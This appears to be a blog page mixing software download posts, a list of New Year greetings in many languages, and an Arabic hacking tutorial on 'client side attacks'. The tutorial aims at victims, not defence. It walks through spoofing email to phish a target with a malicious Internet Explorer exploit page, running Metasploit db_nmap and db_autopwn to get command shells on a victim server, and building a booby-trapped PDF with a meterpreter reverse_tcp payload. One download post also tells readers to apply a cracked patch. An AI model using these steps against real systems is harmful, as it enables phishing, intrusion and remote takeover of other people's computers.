[01.png]

Maltego is a program that can be used to determine the relationships and real world links between: People, Groups of people (social networks), Companies, Organizations, Web sites, Internet infrastructure such as:
Domains
DNS names
Netblocks
and much more

This new release of Maltego comes with a bunch of new features. The core engine has been completely rewritten, the search options and transforms has been enhanced. With Maltego, we can say that we deal with the best Intelligency Software ever. It can be used by various profil of people : security auditors, police investigation, web watching, name tracking and more.

[02.png]

New features and major changes for Maltego 2.0

Load/Save of entire graphs means you can always go back to your investigation.
Printing of graphs (over multiple pages) for discussions.
Export of entities (CSV format) makes it easy to import Maltego data into other databases.
Commercial grade layout library:

  • The layout and navigation have been optimized for speed and usability.
  • Four layout types to rearrange data the way YOU want it.
  • Two view types for finding relevant info on large graphs.
  • More entities and 20 brand new transforms for even deeper searches and more information.
    Search/Find (on entity value, detailed info and additional fields) helps you to get to key nodes quicker.
    Multiple open graphs on different tabs for easy switching between graphs.
    Dedicated clear-all, zoom buttons for notebook users.
    Hollywood quality look & feel will impress your friends and your boss.
    Integrated help on transforms and entities to increase your learning curve.
    Complete user guide ensures you are never lost.
    Prepopulated and preconfigured transforms and transform sets saves you time.
    Population of API key integrated with license key so it’s never lost.
    Platform independent installer means you can install it anywhere.
~~4 Win 32 Download



https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0nzQdil5cFLdebBDDwe6nxuIMpTwzUxETBtiU86MCZkb09gncArX6Yg3b39nl7zI-5o27x5hb4II_0xjHWXYSgHmMdGo-oHjwXgVdwQb6eyE3O_qQsxdAnjT7h49vXuhOZLVNYibVY3uu/s400/289dcgp.jpg.png
Information:
USB Safely Remove is a USB device manager. It saves time and extends user abilities on active work with flash drives, portable drives, card readers and other gadgets.
The main disadvantage of using built-in Windows safe removal tool is that in case of having several hot-plug devices it is quite difficult to recognize a needed to stop device - the most devices have the same name - "USB mass storage device". In addition, Windows does not let you hide a device you would not want to stop from the menu.
USB Safely Remove saves you from these problems and offers an original and multifunctional stopping menu, which displays actual device names with icons. Using this menu you can find and stop a device in a snap!

FEATURES:
The new version of USB Safely Remove significantly improved the feature to autorun programs on device connection\disconnection.

*Unlimited number of processes to launch
You may specify to launch any number of processes for specified event. For example you may setup launching a backup of the drive before stopping and following disomounting of a TrueCrypt volume
*Optional command line parameters
You may pass such device parameters as drive letter, drive label, device PNP name into the process command line via parameter templates (e.g. this command line will browse a drive in Explorer on device connection: explorer.exe %DriveLetter%)
*New events to launch programs
Now programs can be launched after device plugging, before device stopping, after device stopping and after device removing
*Global autorun
You can setup a program to be launched not only for certain device, but for all hotplug devices in the system

One click templates!
Dislike reading boring documentation, but interested in one of the following things?
* Browsing a drive with Explorer or total commander on device connection
* Scanning a device for viruses on its connection
* Making automatic backup of a flash-drive folder
* Automatic mounting and dismounting a TrueCrypt volume stored on a device

install
run the setup
then copy and paste the patch in to the installation folder

~~Download

Link Fixed ;)



[firefox_.jpg]
Mozilla Firefox - faster, more secure, easier to use and sporting a new look, this latest Firefox release sets a new standard for web browser innovation. Mozilla Firefox project (formerly Firebird, which was formerly Phoenix) is a redesign of Mozilla's browser component, written using the XUL user interface language and designed to be cross-platform. It is small, fast and easy to use, and offers many advantages over other web browsers, such as the tabbed browsing and the ability to block pop-up windows. Firefox has the most ways to customize your online experience specifically for the way you use the web. There are more than 6,000 Add-ons (little extras that augment Firefox to meet your unique needs) just waiting out there to help you do more, have more fun and be more creative online. Firefox keeps your personal info personal and your online interests away from the bad guys. Simply put, your security is our top priority.

[2ljgos8.png]
~~Download


تميز بسرعة بالتصفح كما انه يحتوي على مميزات مثل تنظيم الصفحات على شكل تابز في اعلى الصفحة وايضا دعم ميزة الأخبار الفورية RSS وموجود فيه ايضا إضافات الـ Plugins اللي تعطيك عالم كامل من الإضافات مثل الحالة الجوية وبرامج إدارة التحميل المرفقة طبعا غير الألوان والثيمز اللي فيه,,, وهو متوافق مع كل اصدارات الوندوز و فعلا المتصفح ده اسرع من اي متصفح اخر عن تجربة .



New Wallpapers 2010

~ Posted by Joe2010 | Tagged with | 2 Comments






~ Posted by Joe2010 | Tagged with | 6 Comments

[holidaytext.gif]
[newyear.JPG]

Bonne année en Françe :
En Alsacien : e glëckliches nëies OU güets nëies johr
En Basque : urte berri on
En Breton : bloavezh mat OU bloavez mad
En Corse : pace e salute
En Provencal : bòna annada
En Provencal rhodanien : bono annado
En Francique Lorrain : Proscht nei Johr OU Beschte Wìnsch fer's neije Johr
En Languedocien : bona annada
Bonne année en Créole :
En Créole ANTILLAIS : bon lanné
En Créole GUADELOUPÉEN : bonne année
En Créole GUYANAIS : bon nannen OU bon lannen
En Créole HAITIEN : bònn ané
En Créole MARTINIQUAIS : bon lanné OU bonanné
En Créole MAURICIEN : banané
En Créole RÉUNIONNAIS : bone-érèz ané
En Créole SEYCHELLOIS : mon swet zot la bonn anen
Bonne année dans le monde entier :
En Anglais : Happy new year
En Arabe : aam saiid. sana saiida
En Japonais : akemashite omedetô
En Chinois : Sun nien fai lok
Pour le Chinois Mandarin : Xin nian yu kuai
En Italien : felice anno nuovo OU buon anno
En Portugais : feliz ano novo
En Danois : Godt Nytår
En Allemand : Gutes Neues Jahr
En Iran : Aide shoma mobarak
En Albanais : Gëzuar vitin e ri
En Hawaiien : Hauoli Makahiki Hou
En Hebreux : Shanah tovah
En Vietnamien : Nyob zoo xyoo tshiab
En Indonesien : Elamat Tahun Baru
En Afrikaans : gelukkige nuwejaar
En Arménien : shnorhavor nor tari
En Azeri : yeni iliniz mubarek
En Bambara : bonne année
En Bas Saxon : gelükkig nyjaar
En Bengali : subho nababarsho
En Berbère : asgwas amegas
En Beti : mbembe mbu
En Bioelorusse : Z novym hodam
En Birman : hnit thit ku mingalar pa
En Bobo : bonne année
En Bosniaque : sretna nova godina
En Bulgare : chestita nova godina
En Cantonais : kung hé fat tsoi
En Catalan : bon any nou
En Coréen : seh heh bok mani bat uh seyo
En Croate : sretna nova godina
En Espagnol : feliz año nuevo
En Esperanteo : felicxan novan jaron
En Estonien : head uut aastat
En Feroien : gott nýggjár
En Finnois : onnellista uutta vuotta
En Flamand : gelukkig Nieuwjaar
En Frison : lokkich neijier
En Frioulan : bon an
En Gaélique d'Ecosse : bliadhna mhath ur
En Gaélique d'Irlande : ath bhliain faoi mhaise
En Galicien : feliz aninovo
En Gallo : Bónn anaèy
En Gallois :blwyddyn newydd dda
En Géorgien : gilocavt akhal tsels
En Grec : kali chronia OU kali xronia
En Gujarati : sal mubarak
En Guarani :rogüerohory año nuévo-re
En Hindi : nav varsh ki subhkamna
En Hmong : nyob zoo xyoo tshiab
En Hongrois : boldog új évet
En Indonésien : selamat tahun baru
En Islandais : farsælt komandi ár
En Javanais : sugeng warsa enggal
En Kabyle : asseguèsse-ameguèsse
En Kannada : hosa varshada shubhaashayagalu
EN Kazakh : zhana zhiliniz kutti bolsin
En Khmer : sur sdei chhnam thmei
En Kirundi : umwaka mwiza
En Kurde : sala we ya nû pîroz be
En Lao : sabai di pi mai
En Latin : felix sit annus novus
En Letton : laimigu Jauno gadu
En Ligure : feliçe annu nœvu
En Lingala : mbula ya sika elamu na tonbeli yo OU bonana
En Lituanien : laimingu Naujuju Metu
En Luxembourgeoins : e gudd neit Joër
En Macédonien : srekna nova godina
En Malais : selamat tahun baru
En Malgache : arahaba tratry ny taona
En Maltais : is-sena t-tajba
En Maori : kia hari te tau hou
En Marathi : navin varshaachya hardik shubbheccha
En Mongol : shine jiliin bayariin mend hurgeye
En Moré : wênd na kô-d yuum-songo
En Néerlandais : gelukkig Nieuwjaar
En Occitan : bona annada
En Ourdou : naya saal mubarik
En Ouzbek : yangi yilingiz qutlug' bo'lsin
En Persan : sâle no mobârak
En Polonais : szczesliwego nowego roku
En Romanche : bun di bun onn
En Romani : bangi vasilica baxt
En Roumain : un an nou fericit OU la multi ani
En Russe : novim godom
En Samoan : ia manuia le tausaga fou
En Sango : nzoni fini ngou
En Sarde : bonu annu nou
En Serbe : srecna nova godina
En Shimaroé : mwaha mwema
En Shona : goredzwa rakanaka
En Sindhi : nain saal joon wadhayoon
En Sinhala : suba aluth avuruddak vewa
En Slovaque : stastlivy novy rok
En Slovène : srecno novo leto
En Sobota : dobir leto
En Sranan : wan bun nyun yari
En Suédois : gott nytt år
En Suisse-Allemand : es guets Nöis
En Swahili : mwaka mzuri OU heri ya mwaka mpya
En Tagalog : manigong bagong taon
En Tahitien : ia orana i te matahiti api
En Tamoul :iniya puthandu nalVazhthukkal
En Tatar : yaña yil belän
En Tchèque : štastný nový rok
En Telugu : nuthana samvathsara subhakankshalu
En Thai : sawatdii pimaï
En Tibétain : tashi délek
En Turc : yeni yiliniz kutlu olsun
En Udmurt : Vyl Aren
En Ukrainien : Z novym rokom
En Vietnamien : Cung Chúc Tân Niên OU Cung Chúc Tân Xuân
En Wallon : bone annéye OU bone annéye èt bone santéye
En Wolof : dewenati
En Yiddish : a gut yohr


Special Security 2010





إختراق أجهزة السرفرات والأجهزه العاديه
بسم الله الرحمن الرحيم
والصلاة والسلام علي أشرف المرسلين محمد إبن عبد الله النبي الأمين
وعلي امته ومن تبعه بإخلاص إلي يوم الدين

-------------------------
إختراق أجهزة السرفرات والأجهزه العاديه

كثر الحديث عن إمكانية الإختراق بالايبي فقط . . هل يمكن ذلك او لا ؟

ربما اصبح السؤال متأخر جدا في هذا الوقت لوجود مشاريع الإختراق وكثرتها وجعلها من المصادر المفتوحه

وسندرس اليوم بإن الله جآنب من عمليات الإختراق التي تهدد المستخدم العادي والغير عادي

وأقصد بالمستخدم العادي Personal Computing استخدام الكمبيوتر بشكل شخصي

والمستخدم الغير عادي أجهزة السرفرات والشركات والمؤسسات ... إلخ

والجانب الذي سندرسه اليوم هو أخطر جوانب عمليات الإختراق التي تهدد المستخدمين



حيث ان تلك العمليه تنجح بها في إختراق الضحيه بنسبة تعدو الـ 75% .. << لآ يستهان بها طبعا . Client Side Attacks

و سنقسم موضوع اليوم باذن الله كالتالي :

تعريف بالكلينت سايد أتاكس
1
Client
Side Attacks
2
بعض البرامج التي يمكن استغلالها

3- تطبيق عملي علي أحد الثغرات
------------------
بسم الله نبدأ
ما هي الـ
(Client Side Attacks)

أبدا تعريف الكلينت سايد اتاك بنفس التعريف الذي بدأ به Tim Greene عندما شرح الكلينت سايد اتاكس

إقتباسا عن معهد سانس < غني عن التعريف تلك المقوله المقتبسه عن هي :
كود PHP:
Client-side vulnerabilities are among the biggest threats facing users, the SANS Institute said
ببساطه عندما تريد إختراق ضحيه معينه سواء كان مستخدم عادي او غير عادي كما سبق التفصيل

وبطريقة ما حصلت علي الايبي الشخصي له سواء عن طريق إيهامه بدخول صفحة لتسجيل بياناته

ا ما شابه ذلك من الطرق . . المهم انت معك الان ايبي ضحيتك

لاكن لا تملك عن جهازه أي معلومات فماذا ستفعل ؟

حسنا أجد البعض يقول Nmap Scanning نفحص الايبي بتاعه بأداة nmap

حسنا وماذا اذا لم تجد بجهازه بورتات خاصه ببرامج مصابه ؟؟ ماذا لو كان ضحيتك أذكي مما تتوقع قام بحجب فحص الإن ماب

حاسس انه في واحد نذل هيقولي نستخدم برنامج فحص تاني غير الان ماب هههههههههه

معاك في دي لاكن فرضا انك لم تجد ايضا برامج مصابه فما الحل ؟

هنا يأتي دور الكلينت سايد اتاكس

وهي تعتمد أكبر الإعتماد علي تحليلك لشخصية الضحيه ويدخل بها أيضا جزء من الهندسه الإجتماعيه

يمعني ؟ بمعني انك تقوم بتخمين برنامج معين يكون الضحيه يستخدمه او يكون البرنامج منتشر علي الكثير من الاجهزه

ما عنيته بتدخل الهندسه الاجتماعيه في ذلك المجال

هو حديثك مع الضحيه ولنفرض انك عرفت بانه مطور مواقع اذا فبحسبه سريعه مطورو المواقع يحتاجون الي :

انترنت اكسبلورر وبعض برامج التصميم وبرنامج مساعد في التعديل علي الملفات وأشهرها notepad++

ومن المعروف انه برنامج النوت باد بلص بلص فيه ثغرات خطيره جدا ومنها ما تدعمه الميتا سبلويت

اذا نستخدم الثغره علي اي بي الضحيه ونحاول اختراقه وهكذا

وإنت وتخمينك

يعني دلوقت الكلينت سايد اتاك هو استهداف برنامج يستخدم بشكل أساسي وإستغلال ثغراته في اختراق الضحيه . .

2 - بعض البرامج التي يمكن استغلالها

طبعا من أشهر البرامج المستخدمه في ألاجهزه

و أشهر المصابين والمتواجدين علي اجهزة المستخدمين بشكل مبالغ فيه وهي internet explorer

notepad++ & gom player & winamp

هل رأيتم ؟ من منا لا يوجد علي جهازه علي ألاقل واحد من تلك لبرامج ؟؟

وغيرها وطبعا لم أذكر سوي البرامج المصابه بثغرات خطيره والتي اقوم بإستخدامها في أغلب الأوقات

وطبعا للحصول علي ثغرات لتلك البرامج من مشروع الميتا سبلويت لا عليكم سوي تشغيل برنامج الميتا سبلويت

ثم كتابة :
كود PHP:
search programN4me
programn4me يعني اسم البرنامج الذي تريد ان تبحث عن ثغره له وناخذ علي سبيل المثال البحث هن ثغره لبرنامج الجوم بلاير

إختراق أجهزة السرفرات والأجهزه العاديه

كما ترون بحثنا ووجدنا ثغره خطيره من نوع بفر اوفر فلو يمكن استخدامها واستغلالها ببساطه . .

وتستطيعون البحث أيضا بجوجل عن البرامج التي تتوقعون بأن الضحيه يستخدمها

3 - تطبيق عملي

وعفوا ساشرح تلك النقطه بانجاز نظرا لقلة الوقت . . لاكن ساوضح بعض التفاصيل حتي تفهموني .

بالفعل اكثر الثغرات وأشهرها وللاسف انها موجوده في معظم الاجهزه حتي أجهزة سرفرات المواقع

هي ثغرات الانترنت اكسبلورر . . . فنجد ان الكثيرين من مستخدمي الانترنت يتصفحونه عن طريق ذلك العقيم الانترنت اكسبلورر

هل تريدون أن اصرح لكم بسر صغيرإختراق أجهزة السرفرات والأجهزه العاديه << الهكر الاول في الزون اتش الهكر التركي ايسكربوتكس يستخدم الانترنت اكسبلورر إختراق أجهزة السرفرات والأجهزه العاديه وقد رايته بجهازه أثناء تصفحه لاحد الشلات الملغمه ويال الاسي هههههههه

حسنا فلنكمل . . حتي حينما تقوم بتنصيب وندوز جديد تجد عموو اكسبلورر نازل معاه غصب هههههههههه

اكيد طالما تابع لميكروسوفت

انا عن نفسي بمجرد ما انصب الوندوز أروح للبروجرام فايلز واحذفه طوالي Lolz@

تجربة اليوم ستكون علي جهاز سرفر وندوز يعني ليس مستخدم عادي ..

حسنا اذا فهو يستخدم الانترنت اكسبلورر . .

سريعا ودون تضييع للوقت ساستخدم ثغره مصاب بها الانترنت اكسبلورر وهي موجوده في الميتا سبلويت بإسم :

كود PHP:
ie_xml_corrupitaion
إختراق أجهزة السرفرات والأجهزه العاديه

حسنا من متطلبات الثغره url يعني رابط كايبي مثلا يكون ايبي ثابت يتم وضع الصفحه الناتجه من الثغره عليه

حتي ترسلها للضحيه وبمجرد دخوله اليها تقوم بإختراقه . . .

وقد استخدمت في ذلك جهاز ريموت ديسك توب لانه ايبي ثابت واقدر اتصل منه علي اي بورت

حسنا الخطوه الاولي في الاستغلال سريعا ابحث في موقع الهدف عن اميله

وجدته . . الخطوه الثانيه استخدم سكربت ميلر حتي اقدر ارسل للضحيه رساله من اي اميل اريده


الخطوه الثالثه تجهيز رساله مخادعه مع رابط لموقع عادي ويكون الهيبر لينك لها هو رابط صفحتي الملغومه .

الخطوه الرابعه أنتظر وقوع الضحيه في الفخ . .

إختراق أجهزة السرفرات والأجهزه العاديه

1 2 3 4 . . . فشل في العمليه !! لماذا ؟؟ الضحيه لم يدخل علي الرابط !!

اذا فما الحل ؟؟

وجدتها انا بحثت عن البرامج المصابه عند الضحيه ولم ابحث عن ثغرات للنظام الخاص بالضحيه !!


يمعني انني عندما قمت بفحص جهاز السرفر باداة nmap وجدت معظم البورتات مفلتره

والبورتات المفتوحه ليس لبرامجها ثغرات

لاكني نسيت ان تخمين الان ماب قال بان الضحيه يستخدم نظام وندوز sp1 والتخمين بنسبة 97 في الميه

اذا هنا سيكون اللعب سنقوم بالبحث في الميتا سبلويت عن ثغرات لنظام الوندوز من نوع sp1

وساستخدم اداة

كود PHP:
db_autopwn
حتي أستطيع تجربة اكبر عدد من الثغرات وبشكل اوتوماتيكي إختراق أجهزة السرفرات والأجهزه العاديه
حسنا نقوم بفتح الميتا سبلويت

ثم نقوم بتحميل sqlite3 بالامر :

كود PHP:
load db_sqlite3
ثم نقوم بإنشاء قاعدة بيانات جديده لاستخدامها

كود PHP:
db_create hima
ثم نستخدم الامر db_ ونستعرض الخواص الممكن استخدامها وأهمها هو :

كود PHP:
db_nmap And db_autopwn
إذا نقوم باستخدام اداة الفحص db_nmap لفحص ضحيتنا بالأمر :

كود PHP:
db_nmap 41.24.57.263
طبعا الايبي اللي انا كاتبه فوق هو أيبي وهمي إختراق أجهزة السرفرات والأجهزه العاديه

حسنا إنتهي الفحص والإن :

كود PHP:
db_autopwn -p -e -b
ولنطلق العنان للاوتوبون إختراق أجهزة السرفرات والأجهزه العاديه

بعد تجربة عدة ثغرات وجدت أن لدي 3 sessions إختراق أجهزة السرفرات والأجهزه العاديه << طبعا كوماند شل command shell
كود PHP:
msf > sessions -l

Active Sessions
===============

Id Description Tunnel
-- ----------- ------
1 Command shell xx.xxx.xx.xxx:An Port -> My ip:An Port
2 Command shell xx
.xxx.xx.xxx:An Port -> My ip:An Port
3 Command shell xx
.xxx.xx.xxx:An Port -> My ip:An Port

msf
> sessions -i 2
[+] Starting interaction with 2..

Microsoft Windows XP [Version 5.1.2600]
(
C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>
-------------------------------------------------

هذا تطبيق إخر لثغره اخري علي السريع ربما يفيدكم بإذن الله :

كود PHP:
msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit
(adobe_utilprintf) > set FILE**** BestComputers-UpgradeInstructions.pdf
FILE
**** => BestComputers-UpgradeInstructions.pdf
msf exploit
(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD
=> windows/meterpreter/reverse_tcp
msf exploit
(adobe_utilprintf) > set LHOST 192.168.8.128
LHOST
=> 192.168.8.128
msf exploit
(adobe_utilprintf) > set LPORT 4455
LPORT
=> 4455
msf exploit
(adobe_utilprintf) > show options

Module options
:

****
Current Setting Required Description
---- --------------- -------- -----------
FILE**** BestComputers-UpgradeInstructions.pdf yes The file ****.
OUTPUTPATH /pentest/exploits/framework3/data/exploits yes The ******** of the file.


Payload options (windows/meterpreter/reverse_tcp):

****
Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 192.168.8.128 yes The local address
LPORT 4455 yes The local port


Exploit target
:

Id ****
-- ----
0 Adobe Reader v8.1.2 (Windows XP SP3 English)

msf > exploit(adobe_utilprintf) > exploit
-----------------------------------------------------

إلي هني ينتهي موضوع اليوم وأرجو أن أكون وفقت في الشرح والتوضيح وآسف علي التقصير

وهذا كان تعريفي وشرحي لهجمات Client Side Attacks وبعض الطرق المستخدمه في استغلال تلك الهجمات

أما تعريف معهد سانس لذلك النوع من الهجمات فيتلخص في :

كود PHP:
Attackers are going after weaknesses in desktop applications such as browsers, media players, common office applications and e-mail clients
ملحوظه : من لديه المزيد من المعلومات عن ذلك النوع فليتفضل بالطرح والتوضيح حتي تتسع دائرة المعرفه

وبالختام لا يسعني المقام سوي التوجه بالشكر إلي :

SANS Institute & Tim Greene & Dr.X.D14BL0 & x@Injector

Sinratix & Dr.Hacker & Mohandko & Providor & HcJ & ExH

وإلي جميع أصدقائي دون إستثناء

ولا أرجو منكم سوي الدعاء لي ولوالداي بما تجود به أنفسكم . وجزاكم الله خيرا .

اللهم إغفر للمسلمين والمسلمات والمؤمنين والمؤمنات الأحياء منهم والأموات

إنك يا ربنا سميع مجيب الدعوات . وصلي الله وسلم علي سيدنا محمد وعلي آله وصحبه أجمعين.

أخوكم إبرآهيمـ
ViRuS_HimA.
Source : Hell-Z0NE




 
Free directory submissions
>: Blog directory Computers blogs Blog Directory & Search engine Computer Security Blogs - BlogCatalog Blog Directory Yoomp blog search directory
Click here to Vote! Hacker TopsitesClick

رشحنا في دليل المواقع العربية دليل المواقع المغرب بلس رشحنا في AlamNew links - دليل عالم نيو رشحنا في دليل مواقع لايف نت